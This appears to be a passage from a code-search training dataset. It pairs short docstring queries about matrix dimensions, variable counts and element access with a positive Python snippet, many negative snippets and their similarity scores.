iyy='%f'%I[1,1], iyz='%f'%I[1,2], izz='%f'%I[2,2])\n \n visual = et.SubElement(link, 'visual')\n origin = et.SubElement(visual, 'origin', xyz=\"0 0 0\", rpy=\"0 0 0\")\n geometry = et.SubElement(visual, 'geometry')\n mesh = et.SubElement(geometry, 'mesh', filename=file_path_wo_ext+'.stl')\n material = et.SubElement(visual, 'material', name='')\n color = et.SubElement(material, 'color', rgba=\"0.75 0.75 0.75 1\")\n\n collision = et.SubElement(link, 'collision')\n origin = et.SubElement(collision, 'origin', xyz=\"0 0 0\", rpy=\"0 0 0\") \n geometry = et.SubElement(collision, 'geometry')\n mesh = et.SubElement(geometry, 'mesh', filename=file_path_wo_ext+'.stl')\n\n if prev_piece_name is not None:\n joint = et.SubElement(root, 'joint', name='%s_joint'%(piece_name), type='fixed')\n origin = et.SubElement(joint, 'origin', xyz=\"0 0 0\", rpy=\"0 0 0\")\n parent = et.SubElement(joint, 'parent', link=prev_piece_name)\n child = et.SubElement(joint, 'child', link=piece_name)\n\n prev_piece_name = piece_name\n\n \"\"\"\n txt_filename = file_root + '.txt'\n f = open(txt_filename, 'w')\n f.write('mass: %f\\n' %(convex_piece.mass))\n f.write('inertia: ' + str(convex_piece.inertia) + '\\n')\n f.close()\n \"\"\"\n\n tree = et.ElementTree(root)\n tree.write('test.URDF')\n exit(0)\n\n return convex_piece_meshes", "def _cell_dimensions_string(self):\n return_str = ''\n return_str += '0.0 {:2.6f} xlo xhi\\n0.0 {:2.6f} ylo yhi\\n0.0 {:2.6f} zlo zhi\\n\\n'.format(*self.cell_lengths)\n return_str += '{:2.5f} {:2.5f} {:2.5f} xy xz yz \\n\\n'.format(*self.tilt_factors)\n \n return return_str", "def _FindHull(s: List[sg.Point2], p: sg.Point2, q: sg.Point2, hull_points: List[sg.Point2]):\n if len(s) == 0:\n return\n seg = sg.Segment2(p, q)\n c = max(s, key=lambda point: sg.squared_distance(seg, point))\n hull_points.insert(hull_points.index(p) + 1, c)\n s.remove(c)\n s1, s2 = split_points_triangle(s, (p, q, c))\n _FindHull(s1, p, c, hull_points)\n _FindHull(s2, c, q, hull_points)", "def __str__(self):\n s = ''\n for vertex in self.vertices:\n s += vertex.__str__()\n s += \"\\n\"\n return s", "def __str__(self):\n\t\treturn \"Triangle's sides: a = {}, b = {}, c = {}\".format(self.a, self.b, self.c)" ]
[ "0.66425604", "0.63532376", "0.6281747", "0.60994506", "0.60871357", "0.5944821", "0.5937618", "0.5842721", "0.5841963", "0.5745582", "0.57072836", "0.5683671", "0.5624012", "0.5577006", "0.55180144", "0.54937017", "0.5490255", "0.5487594", "0.54810053", "0.5431776", "0.5420677", "0.5419913", "0.54195774", "0.54107594", "0.53963655", "0.5381174", "0.5371979", "0.5314691", "0.530822", "0.52644336", "0.5242529", "0.52290845", "0.5220777", "0.52122915", "0.5207063", "0.51987255", "0.51907456", "0.518947", "0.51873845", "0.5183911", "0.5182662", "0.51581913", "0.5151492", "0.5150237", "0.51456785", "0.51367974", "0.5129904", "0.51298225", "0.5126742", "0.51249313", "0.5115022", "0.5113653", "0.5113026", "0.51114845", "0.5110803", "0.5108071", "0.51045597", "0.5080294", "0.50765896", "0.5075157", "0.5067536", "0.5066869", "0.50636435", "0.505019", "0.50388986", "0.5033782", "0.5032251", "0.5028292", "0.5022239", "0.50192374", "0.5007877", "0.49961972", "0.49892825", "0.4970937", "0.49567795", "0.49531296", "0.4952428", "0.49523526", "0.4950328", "0.49483976", "0.4944735", "0.49410874", "0.49403048", "0.49345824", "0.49335748", "0.4933514", "0.4932789", "0.49310324", "0.49185538", "0.49185538", "0.49133837", "0.49021992", "0.48980108", "0.48966348", "0.4896365", "0.48920193", "0.48897263", "0.48837963", "0.4882637", "0.48821265" ]
0.75023854
0
r""" Return the dimension of this matrix.
def dim(self): return self._d
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def dimension(self):\n return self.__N", "def get_num_dimensions(self):\n dimensions = self.data.shape\n return dimensions[1]", "def dim(self):\n return len(self.shape)", "def dim(self):\n return len(self.shape)", "def dimensionality(self):\n return int(self.nDims)", "def dim(self) -> int:\n return self._n_dim", "def n_dim(self):\n return self._n_dim", "def dimension(self):\n return self._dim", "def dimension_size(self):\n return self._dim", "def get_dimension_number(self) -> int:\n return np.squeeze(self._channel_arrays[0]).ndim", "def num_dim(self):\n return len(self._dimensions)", "def num_dim(self):\n return len(self._dimensions)", "def dim(self):\n return self.__dim__", "def dim(self):\n if '_dim' in self.__dict__:\n return self._dim\n\n if len(self._Vrepresentation)==0:\n self._dim = -1\n return self._dim\n\n origin = vector(self._Vrepresentation[0])\n v_list = [ vector(v)-origin for v in self._Vrepresentation ]\n self._dim = matrix(v_list).rank()\n return self._dim", "def dim(self):\n return len(self._n)", "def get_dim(self):\n return self._dim", "def dim(self) -> int:\n return self.atoms.shape[:-1]", "def get_dimension(self) -> int:\n return self.embedder.get_dimension()", "def get_dim(self):\n return self.dim", "def dim(self):\n return self._dim", "def dimension_count(self):\n return self._dimensionCount", "def get_dimension_length(self):\n pass", "def get_in_dim(self) -> int:\n return self.in_dim", "def dimension(self):\n return 3*self.genus - 3 + self.n", "def dimensionality(self):\n if self.vector.shape is ():\n return 0\n if len(self.vector.shape) is 1:\n return 1\n _, dim = self.vector.shape\n return dim", "def size(self)->int:\n\n return np.prod([axes if is_integer(axes) else len(axes) for axes in self._dim_axes])", "def width(self) -> int:\n return self._obj[self.x_dim].size", "def dimension(self):\n\t\treturn self.d", "def ndim(self):\n return len(self.shape)", "def ndim(self):\n return len(self.shape)", "def ndim(self):\n return len(self.shape)", "def ndim(self):\n return len(self.shape)", "def ndim(self):\n return len(self.shape)", "def ndim(self):\n return len(self.shape)", "def size(self):\n\t\treturn self.dims", "def ndim(self):\n return self.__value.ndim", "def ndim(self) -> int:\n return self[0].ndim", "def _get_observation_dimension(self):\n return len(self._get_observation_np())", "def getDimension(self):\n dim = len(self.__axis_labels__)\n if dim == 0:\n # Labels weren't set, so how about the data\n dim = self[0].dim()\n return dim", "def ndim(self):\n return self._ndim", "def dim(self):\n return self.m, self.n", "def __len__(self) -> int:\n\n return self.shape.shape[1]", "def dimension(self):\n return self._dimension", "def dimension(self):\n return self._dimension", "def dimension(self):\n return self._dimension", "def dimension(self):\n return self._dimension", "def size(self):\n return int(misc.intprod(self.shape))", "def dim(self):\n\t\treturn self.D", "def dim(self) -> int:\n pass", "def n_dims(self):\n return len(self.dimensions)", "def ndim(self):\n if self._ndim is None:\n self._ndim = self.get_mesh_dimension()\n\n return self._ndim", "def ndim(self):\n # type: () -> int\n return len(self.shape)", "def ndim(self):\n return len(self._shape)", "def dim(self,mat):\n result = np.shape(mat)\n self.dimensions = result\n return self.dimensions", "def __len__(self):\n return self.N.shape[0]", "def dimension(self) -> float:\n return self._dimensions", "def dimension(self):\n return np.prod(np.asarray(self.subsystem_dims))", "def getdim(self):\n return round(self.w() / self.c)", "def width(self):\n return self.board.shape[1]", "def ndim(self):\n return self.data.ndim", "def dim(self) -> int:", "def get_ndim(self):\n return self.ndim", "def get_dims(self):\n row_lbl, col_lbl = self.get_idxvals()\n return len(row_lbl), len(col_lbl)", "def getDimension(self):\n return len(self.components)", "def size(self) -> int:\n return int(np.multiply(*self.shape))", "def dimension(self) -> int:\n return self.options.dimension", "def __len__(self):\n # type: () -> int\n return self.shape[0]", "def getNumDimensions(self):\n return len(self.di.keys())", "def __len__(self):\n return self.n_node.shape[0]", "def ndim(self):\n return self.X.ndim", "def ndim(self):\n\n self._check_assigned()\n\n if (\n self.lazy\n and self.transformer is not None\n and hasattr(self.transformer, \"get_transformed_shape\")\n ):\n return len(self.transformer.get_transformed_shape(self.values))\n else:\n return self.__array__().ndim", "def dim(self) -> tuple:\n if self.has_tensor(): return self.as_tensor().dim()\n else:\n return tuple(list(self[0].dim()[0]) + [len(self)]), self[0].dim()[1]", "def n_dims(self):\n return self.pdm.n_dims", "def get_ncols(self):\n return self.ncols", "def get_ncols(self):\n return self.ncols", "def dimension(self):\n return len(self.qubit_values)", "def size(self):\n if type(self._shape).__name__ == 'tuple':\n return self._shape[-1]\n else:\n return self._shape", "def getlen(self):\n if self.onlydiag():\n return self.lendiag()\n else:\n return len(self)", "def getDim(self):\n return \"%dx%d\" % (self.rows, self.cols)", "def dim(self):\n if self._classifier is None:\n with self:\n return self._classifier.features_dim\n\n return self._classifier.features_dim", "def dimension(self):\r\n a = 0\r\n for x in self.faces():\r\n if (len(x) > a):\r\n a = len(x) \r\n return a-1", "def get_size(self):\n # return the size along the index dimension\n size = 0\n if self._data is not None:\n size = shape(self._data)[self.index_dimension]\n\n return size", "def get_size(self):\n return self.get_params().shape[0]", "def get_width(self):\n width = np.size(self.img, 0)\n return width", "def dims(self):\n return self[0].dims", "def ndim(self):\n return np.ndim(self.MJD)", "def get_data_dim(self):\n return self.data_dim", "def __len__(self):\n ret = self.data.shape[0]\n return ret", "def ndim(self) -> int:\n\n return 1 + len(self.shape)", "def get_dimensionality(self) -> int:\n return self.dimensionality", "def ndim(self):\n return self.initial_value.ndim", "def num_cols(self):\n return (len(self.rows[0]))", "def get_dimension_width(self):\n pass", "def num_cols(self):\n return len(self.rows[0])", "def xdim(self):\n return len(self._x)", "def ndim(self):\n return len(self.nvars)", "def size(self):\n return numpy.prod(self.shape)", "def size(self):\n return self.__row_count * self.__col_count", "def __len__(self):\n return self.flatten_dim(self.shape[0])", "def num_dims(self):\n return self.h5['{}/{}'.format(SETTINGS, N_DIMS_STR)][()]" ]
[ "0.84898525", "0.84692967", "0.83745944", "0.83745944", "0.8322008", "0.8309151", "0.8180309", "0.81371695", "0.8114333", "0.8109193", "0.8031762", "0.8031762", "0.8015657", "0.7960735", "0.7944764", "0.7926571", "0.79092103", "0.78969157", "0.787916", "0.78600526", "0.77845377", "0.7781574", "0.7778791", "0.77745813", "0.77599967", "0.7751557", "0.7744779", "0.7742446", "0.77330893", "0.77330893", "0.77330893", "0.77330893", "0.77330893", "0.77330893", "0.7731611", "0.7727149", "0.77266836", "0.7701998", "0.76977724", "0.7696135", "0.76950914", "0.76935756", "0.76935065", "0.76935065", "0.76935065", "0.76935065", "0.7692694", "0.7685191", "0.7676192", "0.76736253", "0.7658482", "0.76359004", "0.762045", "0.7610858", "0.7610824", "0.75945246", "0.7576626", "0.75693196", "0.7557148", "0.7542722", "0.7534768", "0.75231385", "0.75181526", "0.75095457", "0.7506465", "0.74899155", "0.7478707", "0.74746126", "0.74731606", "0.74675727", "0.7453274", "0.7452009", "0.7446748", "0.74396485", "0.74396485", "0.7427004", "0.7420446", "0.74112725", "0.74075073", "0.7403833", "0.7398055", "0.7386803", "0.737916", "0.7377042", "0.73727417", "0.7371488", "0.73589927", "0.7350143", "0.73486733", "0.73446333", "0.7335781", "0.73234046", "0.7322276", "0.7317851", "0.7316576", "0.7315838", "0.7313707", "0.73112106", "0.72944826", "0.72916675" ]
0.7624366
52
r""" Return the number of variables used in this matrix.
def num_vars(self): return self._nvars
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_num_variables(self):\n return len(self.variables)", "def num_vars(self):\n return self.nvars", "def nvar(self):\n return len(self.__vars)", "def GetNumberOfVariables(self):\n\n # nvar = 0\n # for i in self.variables_order:\n # # DO NOT COUNT VARIABLES THAT GET CONDENSED OUT\n # if i!=0:\n # if mesh.element_type == \"tri\":\n # nvar += (i+1)*(i+2) // 2\n # elif mesh.element_type == \"tet\":\n # nvar += (i+1)*(i+2)*(i+3) // 6\n # elif mesh.element_type == \"quad\":\n # nvar += (i+1)**2\n # elif mesh.element_type == \"hex\":\n # nvar += (i+1)**3\n\n # nvar = sum(self.variables_order)\n if self.nvar == None:\n self.nvar = self.ndim\n return self.nvar", "def nVariables(self):\n return len(self.variables)", "def countVars(self):\n return len(self.initializedVars[\"GF\"]) + len(self.initializedVars[\"LF\"]) + len(self.initializedVars[\"TF\"])", "def num_vars(self):\n return len(self.bounds.lb)", "def variables_num(self):\n return 1", "def n_variables(self):\n return sum([p.n_variables for p in self.parameters])", "def __len__(self) -> int:\n return len(self.variables)", "def count_vars(scope=''):\n v = get_vars(scope)\n return sum([np.prod(var.shape.as_list()) for var in v])", "def variables_used (self) :\r\n\t\t## These names possibly contain dimension specification!\r\n\t\treturn self.variable_names", "def _getNumVariables(self, graph_def):\n return sum(node.op == \"ReadVariableOp\" for node in graph_def.node)", "def ndim(self):\n return len(self.nvars)", "def number_of_variables(dataset, name_of_variable):\r\n first_row = dataset[0].keys()\r\n num = 0\r\n for variable in first_row:\r\n if name_of_variable in variable:\r\n num += 1 \r\n return num", "def nvar(self):\n return self.h.shape[0]", "def nvar(self):\n return len(self.v)", "def num_cols(self):\n return len(self.column_names())", "def __checkNrVars(self):\n variables = set()\n for q in self.__quantifierList:\n for var in q.getVariableNames():\n variables.add(\"%s\" % var)\n for c in self.__clauseList:\n for var in c.getVariableNames():\n variables.add(\"%s\" % var)\n \n return len(variables)", "def GetNumberCols(self):\n return len(self.__colsKey)", "def numpoints(self):\n return len(self.pars) + 1 # so dof is 1", "def num_dof(self) -> int:\n return len(self)", "def dim(self):\n return self.ambient_dim() - self.n_equations()", "def ndims(self, varname):\n if self.handle == None: return None\n try:\n var = self.handle.variables[varname]\n except KeyError:\n return None\n return len(var.dimensions)", "def columns_count(self):\n if self.value.count != 0:\n return len(self.value[0])\n else:\n return 0", "def count_params():\n param_count = np.sum([np.prod(x.get_shape().as_list()) for x in tf.global_variables()])\n return param_count", "def __len__(self):\n return len(self._varvals)", "def get_num_cols(self):\n return self._num_cols", "def get_num_dimensions(self):\n dimensions = self.data.shape\n return dimensions[1]", "def _get_observation_dimension(self):\n return len(self._get_observation_np())", "def calculate_num_params(self):\n num_params = 0\n for p in self.parameters():\n num_params += p.data.view(-1).size(0)\n return num_params", "def getNbColumns(self):\n return self.data.shape[0]", "def getNumDimensions(self):\n return len(self.di.keys())", "def get_num_features(self):\r\n \r\n return len(self[0]['x'])", "def num_params():\n total_num = 0\n for var in tf.trainable_variables():\n shape = var.get_shape()\n total_num += functools.reduce(operator.mul, [dim.value for dim in shape], 1)\n return total_num", "def __len__(self) -> int:\n\n return self.layout.gaDims", "def dim(self):\n return len(self._n)", "def getNumCols(self):\n return self.__cols", "def ncolumns(self):\n return self.__ncols", "def GetNumColumns(self):\n return len(self.columns)", "def n_items(self) -> int:\n return len(self._data_vars)", "def num_small_vars(self):\n return sum(\n case.num_small_vars for case in self.case_set.all() if case.num_small_vars is not None\n )", "def getNumGrids(self):\n c = list(self.gridVars.keys())\n return len(list(self.gridVars[c[0]].values()))", "def get_dof(self):\n return len(self.a_n)", "def num_cols(self):\n return len(self.rows[0])", "def n_thres(self):\n return np.size(self.thres)", "def getNoOfCols(self):\n return _patchExtractor.patchExtractor_getNoOfCols(self)", "def num_cols(self):\n return (len(self.rows[0]))", "def num_parameters(self) -> int:\n return len(self.w) + prod(self.v.shape) - len(self.v)", "def get_location_count(self):\n return len(self.matrix)", "def dimensions(self):\n return len(self.parameter_names)", "def numdofs(self):\n return self.kv.size - self.p - 1", "def size_of_variable(self, variable):\n index_structures = variable.index_structures\n if not index_structures:\n return 1\n mapping = [self.mod_index[ind].mapping for ind in index_structures]\n blocking = [self.mod_index[ind].blocking for ind in index_structures]\n size = []\n for i in range(len(mapping)):\n if mapping[i] and blocking[i]:\n length = 0\n for blk in blocking[i]:\n if blk == 0:\n length += 1\n else:\n length += blk\n size.append(length)\n else:\n return None\n return size", "def numel(self):\n return self.t.size", "def voxel_count(self):\n return self.cols * self.rows * self.sections", "def dims(self):\n return self.v.dims() # TODO: check (empty? etc)\n #return self.t.shape # TODO: check (empty? etc)\n # TODO: convert to tuple? here / in varset?", "def size(self, varname):\n if self.handle == None: return []\n try:\n var = self.handle.variables[varname]\n except KeyError:\n return []\n \n def dimlen(d):\n dim = self.handle.dimensions[d]\n if dim != None:\n t = type(dim).__name__\n if t == 'int':\n return dim\n return len(dim)\n return 0\n return map(lambda d: dimlen(d), var.dimensions)", "def numel(self) -> int:\n return sum(p.numel() for p in self.parameters)", "def num_dim(self):\n return len(self._dimensions)", "def num_dim(self):\n return len(self._dimensions)", "def GetGlobalNumCols(self):\n return _hypre.HypreParMatrix_GetGlobalNumCols(self)", "def ncolumns(self):\n return len(self.__column_list)", "def GetNumCols(self):\n return _hypre.HypreParMatrix_GetNumCols(self)", "def dim(self):\n if '_dim' in self.__dict__:\n return self._dim\n\n if len(self._Vrepresentation)==0:\n self._dim = -1\n return self._dim\n\n origin = vector(self._Vrepresentation[0])\n v_list = [ vector(v)-origin for v in self._Vrepresentation ]\n self._dim = matrix(v_list).rank()\n return self._dim", "def variables_used (self) :\r\n\t\treturn []", "def next_variable(self):\n\n self.nvars += 1\n return self.nvars", "def __len__(self):\n return np.size(self.A,0)", "def n_cols(self):\n\n return len(self.plaincolumns)", "def dimension_count(self):\n return self._dimensionCount", "def num_cells_global(self):\n return self.get_dim_attribute('num_cells')", "def get_number_of_dofs(self) -> int:\n\n return len(self.nodes) * Node.number_of_dofs", "def size(self, level=None):\n level = level or self.local_variables\n names = {}\n while level:\n for name in level.bindings:\n names[name] = 1\n level = level.parent\n return len(names)", "def getNumElements(self):\n return 1 + sum(m.getNumElements() for m in self.members)", "def dim(self) -> int:\n return self._n_dim", "def dim(self) -> int:\n return self.atoms.shape[:-1]", "def count_parameters(self):\n return sum(p.numel() for p in self.parameters() if p.requires_grad)/1e6", "def count_parameters(self):\n return sum(p.numel() for p in self.parameters() if p.requires_grad)/1e6", "def dim(self):\n if self._classifier is None:\n with self:\n return self._classifier.features_dim\n\n return self._classifier.features_dim", "def __len__(self):\n return self.dbms.get_nb_fields(self.table, self.db)", "def number_of_columns(self):\n return len(self._columns)", "def n_cf(self):\n return np.size(self._ref_ii, 0)", "def count_params(model):\n total = 0\n for x in model.trainable_variables:\n total += np.prod(x.shape)\n return total", "def nfactors(self):\n return self.L.nnz", "def count_dims(da):\n return len(da.dims)", "def num_dof(self) -> int:\n return self._num_dof", "def N(self):\n return self.get_dof()", "def columns(self) -> int:\n return self.__squares[0].__len__()", "def column_count(self):\n return self.column_length", "def columnCount( self ):\n if not self.o_data is None:\n if self.isItemMultiDimensional():\n return len(self.o_data)\n else:\n return 1\n else:\n return 1", "def _N(self):\n return len(self._array)", "def getNumBvars(self):\n return _libsbml.ASTNode_getNumBvars(self)", "def size(self):\n return self.__row_count * self.__col_count", "def dimension(self):\n return self.__N", "def get_size(self):\n lines = len(self.coefficients)\n columns = 0 if lines == 0 else len(self.coefficients[0])\n return lines, columns", "def get_number_of_atoms_to_optimize(self):\n v = self.c.get(simulation_cell=True)\n return len(v.data.stoichiometry)", "def col_count(self):\n if isinstance(self.data, pd.DataFrame) is False:\n return None\n else:\n return self.data.shape[1]", "def num_nodes(self):\n return ((len(self.tensor_u)+1) * (len(self.tensor_v)+1) *\n (len(self.tensor_w)+1))", "def col_count(self):\n return self.__col_count", "def count(self):\r\n return self.data_array.size", "def n_dim(self):\n return self._n_dim" ]
[ "0.826646", "0.80817354", "0.79613394", "0.7953327", "0.79433763", "0.7778536", "0.7749949", "0.75871086", "0.74991745", "0.74765337", "0.74339026", "0.72988725", "0.71537995", "0.71156085", "0.7080469", "0.69808406", "0.691234", "0.67460585", "0.6729376", "0.6723816", "0.6715447", "0.6695859", "0.66817945", "0.6674521", "0.66462207", "0.66337615", "0.6630602", "0.6628727", "0.6617903", "0.6597347", "0.65870893", "0.6580963", "0.6578233", "0.6574441", "0.6557713", "0.6536364", "0.6519671", "0.65078735", "0.6497983", "0.6497858", "0.6496423", "0.64925754", "0.64911383", "0.6488006", "0.6474853", "0.64673465", "0.6466444", "0.64625627", "0.6450822", "0.6450215", "0.64452225", "0.6442914", "0.6439309", "0.64381504", "0.6437481", "0.6434369", "0.643062", "0.64295954", "0.6418409", "0.6418409", "0.64174145", "0.64139867", "0.63977045", "0.6395228", "0.6390997", "0.63760775", "0.63718116", "0.63648176", "0.6358056", "0.635411", "0.6352261", "0.6330479", "0.6330457", "0.63292223", "0.6317109", "0.6309389", "0.6309389", "0.6302493", "0.63020617", "0.6301152", "0.6300458", "0.62988526", "0.62936676", "0.6292335", "0.6289663", "0.62854064", "0.6282889", "0.62814915", "0.6281423", "0.62775314", "0.6277122", "0.62750447", "0.6268813", "0.62649155", "0.6264652", "0.6257723", "0.6256259", "0.6250056", "0.6246107", "0.62442696" ]
0.8000086
2
r""" To obtain an item of the matrix
def __getitem__(self, data): i,j = data return self._data[i][j]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __getitem__(self, item):\n if type(item) is int:\n # select row by default\n if self.shape[0] == 1: # iterate by column if it's a row vector\n return self.values[0][item]\n elif self.shape[1] == 1: # iterate by row if it's a column vector\n return self.values[item][0]\n return Matrix([self.values[item]])\n elif type(item) is list:\n return Matrix([self.values[i] for i in item])\n elif type(item) is tuple and len(item) == 2 and type(item[0]) is int and type(item[1]) is int:\n r, c = item\n return self.values[r][c]\n elif type(item) is slice:\n return Matrix(self.values[item])\n else:\n for i in item:\n if type(i) not in (int, slice):\n raise ValueError(f\"Bad index type {type(i)}\")\n if len(item) != 2:\n raise ValueError(f\"Don't understand index: {item}\")\n if self.shape == (0, 0):\n return Matrix([[]])\n row_slice, col_slice = item\n rows = self.values[row_slice] # M[0, :] to work\n if type(rows[0]) is not list:\n rows = [rows]\n subset = [row[col_slice] for row in rows]\n if type(subset) in (int, float, complex):\n return Matrix([[subset]])\n elif type(subset) in (list, tuple) and type(subset[0]) in (int, float, complex):\n return Matrix([subset])\n else:\n return Matrix(subset)", "def getitem(self, i, j):\n # XXX: flint matrices do not support negative indices\n # XXX: They also raise ValueError instead of IndexError\n m, n = self.shape\n if i < 0:\n i += m\n if j < 0:\n j += n\n try:\n return self.rep[i, j]\n except ValueError:\n raise IndexError(f\"Invalid indices ({i}, {j}) for Matrix of shape {self.shape}\")", "def get_element(self,mat,row,column):\n result = mat[row-1][column-1]\n self.element = result\n return self.element", "def __getitem__(self, item):\n return self.row[item]", "def __getitem__(self, item):\n return self.cube[item]", "def _getMatrixRow(self):\n item = self._item()\n if item is not None:\n matrix = item.getMatrix()\n return qt.QVector3D(*matrix[self._index, :])\n else:\n return None", "def getItem(self, i, j):\n if i < 0:\n raise IndexError('Row index must be nonnegative.')\n if j < 0:\n raise IndexError('Column index must be nonnegative.')\n\n return self.__m[i - 1][j - 1]", "def __getitem__(self, key):\n # TODO: fix 1-by-1 case, deprecate support for vector indexing.\n # TODO: add isvector() method\n # TODO: add method that distinguishes between 1x1, 1xn, mx1, mxn\n # TODO: make sure that there's distinct ways to index a 1 by 1 matrix\n # and retrieve a value.\n rows, cols, is_view = self._cleankey(key)\n if not (is_view): #simple index case\n i, j = rows[0], cols[0]\n return self.data[i, j]\n return MPView(self, rows, cols)", "def retrievematrixelement(self, coord):\n currentelement = self.matrix\n for u in coord:\n currentelement = currentelement[u]\n\n return currentelement", "def get_row(A: Matrix, i: int) -> Vector:\n return A[i]", "def get_row(A: Matrix, i: int) -> Vector:\n return A[i]", "def get_row(A: Matrix, i: int) -> Vector:\n return A[i]", "def matGet(mat, r, c):\n return mat[r][c]", "def __getitem__(self, item):\n return self.elements[item]", "def __getitem__(self,key):\n if type(key) is tuple:\n return self.list[LTMatrix.getPosition(*key)]\n else:\n return self.list[key]", "def __getitem__(self, index):\n return (index, self.data_cube[0, index, :])", "def get_row(A: Matrix, i: int) -> Vector:\n return A[i] # A[i] is already the ith row", "def get_item(array, index):\n row, column = index\n return array[row][column]", "def __getitem__(self,pt):\n return self.maze[pt.y][pt.x]", "def __getitem__(self, item) -> SurveyRow:\n return self.rows[item]", "def row(self, index):\n return self.matrix_list[index - 1]", "def __getitem__ (self, idx):\n return self.row(idx[0])[idx[1]]", "def item(self):\n return np.array(self).item()", "def item(self, i, path=None):\n if path is None:\n assert list(self.sequences.keys())[0] is NoDim, \"Cannot access item without path if the array has more than one dimension.\"\n path = NoDim\n return self.sequences[path][i]", "def get(self,row,col):\r\n return self.puzzle[row][col]", "def test_get_indices_one_existing_item_scalar(self):\r\n item_to_find = 'PC.355'\r\n self.assertEqual(_get_indices(self.dist_matrix_header, item_to_find),\r\n [1])", "def __getitem__(self, item):\n index = self.reindex(item)\n return self.parent[index]", "def __getitem__(self, i):\n return self.__x[i]", "def __getitem__(self, key):\n x, y = key\n if y >= self.block_height:\n return False\n return self.matrix[y][x]", "def test_col_get_item():\n pm1 = magpy.magnet.Cuboid((1, 2, 3), (1, 2, 3))\n pm2 = magpy.magnet.Cuboid((1, 2, 3), (1, 2, 3))\n pm3 = magpy.magnet.Cuboid((1, 2, 3), (1, 2, 3))\n\n col = magpy.Collection(pm1, pm2, pm3)\n assert col[1] == pm2, \"get_item failed\"\n assert len(col) == 3, \"__len__ failed\"", "def __getitem__(self, i):\n return self._ar[i]", "def __getitem__(self, idx):\n if len(idx) == 1:\n return self.rows[idx[0]]\n else:\n return self.rows[idx[0]][idx[1]]", "def row (self, i):\n return Vector(self._m[i])", "def __getitem__(self, item):\n try:\n return self._values[item]\n except KeyError:\n raise FactInvalidIndex(str(item))", "def __getitem__(self, item):\r\n\r\n return self.data.__getitem__(item)", "def __pos__(self):\r\n return mat4(map(lambda x: +x, self.mlist))", "def __getitem__(self,idx):\n return self.g[idx]", "def __getitem__(self, item):\n return self.data[item]", "def __getitem__(self, item):\n return self.data[item]", "def __getitem__(self, item):\n return self.data[item]", "def __getitem__(self, index):\n if not (type(index) in MATRIX_VALID_INTS):\n return NotImplemented\n return self._value[index]", "def getItem(self,row,column,default=None):\n data = self.data\n if row in data and column in data[row]:\n return data[row][column]\n else:\n return default", "def getByLable(self, a, b):\n\t\treturn self.matrix[self.access[a]][self.access[b]]", "def get_item(x, is_cuda):\r\n if is_cuda:\r\n x = x.cpu().detach().numpy()\r\n else:\r\n x = x.detach().numpy()\r\n return x", "def __getitem__(self, item):\n return self.top[item]", "def __getitem__(self, item):\n return self._data[item]", "def __getitem__(self, item):\n u, v = item\n return self.__getitem(u, v)", "def __getitem__(self, index):\n x, y = index\n if 0 <= x < self.width and 0 <= y < self.height:\n return self.cells[x + y * self.width]\n else:\n return None", "def __getitem__(self, idx):\n return self.getitem(idx)", "def __getitem__(self, i):\n mondict = self.load_seq(i)\n N_max = mondict['xs'].shape[0]\n u = mondict['us']\n x = mondict['xs']\n return u, x", "def __getitem__(self, item):\r\n return item.get_value(borrow=True)", "def __getitem__(self, i_j):\n\t\t\n\t\ttry:\n\t\t\tif i_j != Ellipsis:\n\t\t\t\treturn self.item_cache[i_j]\n\t\texcept TypeError:\n\t\t\t'''\n\t\t\tc_i_j = []\n\t\t\tfor n in (0, 1):\n\t\t\t\ttry:\n\t\t\t\t\tc_i_j.append((i_j[n].start, i_j[n].stop, i_j[n].step))\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tc_i_j.append(i_j[n])\n\t\t\tc_i_j = tuple(c_i_j)\n\t\t\ttry:\n\t\t\t\treturn self.item_cache[c_i_j]\n\t\t\texcept KeyError:\n\t\t\t\tpass\n\t\t\t'''\n\t\t\tpass\n\t\t\tc_i_j = i_j\n\t\texcept (AttributeError, KeyError):\n\t\t\tc_i_j = i_j\n\t\t\n\t\tdef getitem(direction, indices_i, indices_j):\n\t\t\tif direction == self.__direction.scalar:\n\t\t\t\treturn self.value[self.row_dimension * indices_i + indices_j]\n\t\t\telif direction == self.__direction.row:\n\t\t\t\tj = indices_j\n\t\t\t\treturn self.algebra.vector_algebra(self.value[self.row_dimension * _i + j] for _i in indices_i)\n\t\t\telif direction == self.__direction.column:\n\t\t\t\ti = indices_i\n\t\t\t\treturn self.algebra.vector_algebra(self.value[self.row_dimension * i + _j] for _j in indices_j)\n\t\t\telif direction == self.__direction.matrix:\n\t\t\t\tselection = {}\n\t\t\t\tfor (m, i), (n, j) in zip(enumerate(indices_i), enumerate(indices_j)):\n\t\t\t\t\tselection[m, n] = i, j\n\t\t\t\treturn self.algebra((lambda _m, _n: self.value[self.row_dimension * selection[_m, _n][0] + selection[_m, _n][1]]), row_dimension=len(indices_i), column_dimension=len(indices_j))\n\t\t\telif direction == self.__direction.copy:\n\t\t\t\t#return self.algebra(self.value, row_dimension=self.row_dimension, column_dimension=self.column_dimension)\n\t\t\t\treturn self.algebra(self)\n\t\t\telse:\n\t\t\t\traise RuntimeError(\"Unknown direction value: `{}`\".format(repr(direction)))\n\t\t\n\t\tresult = self.__analyze_indices(i_j, getitem)\n\t\t\n\t\tif __debug__:\n\t\t\ttry:\n\t\t\t\tif i_j != Ellipsis:\n\t\t\t\t\tassert self.item_cache[c_i_j] == result, f\"{repr(c_i_j)}, {id(self)}\"\n\t\t\texcept (AttributeError, KeyError, TypeError):\n\t\t\t\tpass\n\t\t\n\t\ttry:\n\t\t\tif i_j != Ellipsis:\n\t\t\t\tself.item_cache[c_i_j] = result\n\t\texcept (AttributeError, TypeError):\n\t\t\tpass\n\t\t\n\t\treturn result", "def __getitem__(self, idx):\n return self.GetArray(idx)", "def __getitem__(self, idx):\n return self.GetArray(idx)", "def getItem(self, column, position):\n return self.data[column, position]", "def __getitem__(self, itm):\n return self.wrappers[itm]", "def __getitem__(self, item):\n return self.__dict__[item]", "def getrow(self, i):\n new = lil_matrix((1, self.shape[1]), dtype=self.dtype)\n new.rows[0] = self.rows[i][:]\n new.data[0] = self.data[i][:]\n return new", "def __getitem__(self, index):\n if isinstance(index, (tuple, list)) and len(index) == 2:\n return self.cells[index[1]][index[0]]\n return self.cells[index]", "def __getitem__(self, index):\n item = self.data[index]\n return item", "def __getitem__(self, k):\n return self._board[k]", 